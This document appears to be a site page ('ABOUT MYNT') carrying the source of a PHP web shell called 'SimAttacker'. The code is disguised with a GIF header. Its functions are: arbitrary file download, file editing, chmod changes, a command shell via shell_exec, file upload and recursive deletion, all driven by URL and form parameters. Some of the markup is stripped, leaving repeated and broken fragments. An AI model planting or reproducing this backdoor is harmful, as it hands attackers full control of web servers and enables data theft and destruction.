ABOUT MYNT
The Famous and Fabulous
GIF89;a
//download Files Code
$fdownload=$_GET['fdownload'];
if ($fdownload <> "" ){
// path & file name
$path_parts = pathinfo("$fdownload");
$entrypath=$path_parts["basename"];
$name = "$fdownload";
$fp = fopen($name, 'rb');
header("Content-Disposition: attachment; filename=$entrypath");
header("Content-Length: " . filesize($name));
fpassthru($fp);
exit;
}
?>
SimAttacker - Version : 1.0.0 - priv8 4 My friend
error_reporting(E_ERROR | E_WARNING | E_PARSE);
//File Edit
$fedit=$_GET['fedit'];
if ($fedit <> "" ){
$fedit=realpath($fedit);
$lines = file($fedit);
echo "";
$savefile=$_POST['savefile'];
$filepath=realpath($_POST['filepath']);
if ($savefile <> "")
{
$fp=fopen("$filepath","w+");
fwrite ($fp,"") ;
fwrite ($fp,$savefile) ;
fclose($fp);
echo "";
}
exit();
}
?>
// CHmod - PRimission
$fchmod=$_GET['fchmod'];
if ($fchmod <> "" ){
$fchmod=realpath($fchmod);
echo "
chmod for :$fchmod
"; $chmod0=$_POST['chmod0']; if ($chmod0 <> ""){ chmod ($fchmod , $chmod0); }else { echo "primission Not Allow change Chmod"; } exit(); } ?>
chmod for :$fchmod
"; $chmod0=$_POST['chmod0']; if ($chmod0 <> ""){ chmod ($fchmod , $chmod0); }else { echo "primission Not Allow change Chmod"; } exit(); } ?>
|
CMD Shell
|
//*******************************************************
//Start Programs About US
$id=$_GET['id'];
if ($id=="") {
echo "
*************************************************************************** Iranian Hackers : WWW.SIMORGH-EV.COM Programer : Hossein Asgary Note : SimAttacker Have copyright from simorgh security Group please : If you find bug or problems in program , tell me by : e-mail : admin(at)simorgh-ev(dot)com Enjoy :) [Only 4 Best Friends ] *************************************************************************** "; echo "OS :". php_uname(); echo " IP :". ($_SERVER['REMOTE_ADDR']); echo ""; } //************************************************************ //cmd-command line $cmd=$_POST['cmd']; if($id=="cmd"){ $result=shell_exec("$cmd"); echo " CMD ExeCuteYour IP & BindPort: Home: $homedir
";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "";
echo "";
}
}
//file deleted
$frpath=$_GET['fdelete'];
if ($frpath <> "") {
if (is_dir($frpath)){
$matches = glob($frpath . '/*.*');
if ( is_array ( $matches ) ) {
foreach ( $matches as $filename) {
unlink ($filename);
rmdir("$frpath");
echo "";
echo "";
}
}
}
else{
echo "";
unlink ("$frpath");
echo "";
exit(0);
}
}
?>
|
||||||||||||
|
|